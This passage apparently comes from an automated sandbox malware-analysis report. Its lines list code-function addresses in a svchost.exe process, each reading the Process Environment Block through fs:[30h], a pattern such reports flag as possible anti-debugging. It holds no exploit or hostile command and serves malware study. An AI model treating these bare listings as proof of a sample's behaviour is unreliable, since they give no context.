                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBC460 mov ecx, dword ptr fs:[00000030h]1_2_02FBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA456 mov eax, dword ptr fs:[00000030h]1_2_02FEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2645D mov eax, dword ptr fs:[00000030h]1_2_02F2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5245A mov eax, dword ptr fs:[00000030h]1_2_02F5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E443 mov eax, dword ptr fs:[00000030h]1_2_02F6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E420 mov eax, dword ptr fs:[00000030h]1_2_02F2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C427 mov eax, dword ptr fs:[00000030h]1_2_02F2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6420 mov eax, dword ptr fs:[00000030h]1_2_02FB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68402 mov eax, dword ptr fs:[00000030h]1_2_02F68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]1_2_02F5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F325E0 mov eax, dword ptr fs:[00000030h]1_2_02F325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C5ED mov eax, dword ptr fs:[00000030h]1_2_02F6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F365D0 mov eax, dword ptr fs:[00000030h]1_2_02F365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02F6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E5CF mov eax, dword ptr fs:[00000030h]1_2_02F6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F545B1 mov eax, dword ptr fs:[00000030h]1_2_02F545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB05A7 mov eax, dword ptr fs:[00000030h]1_2_02FB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
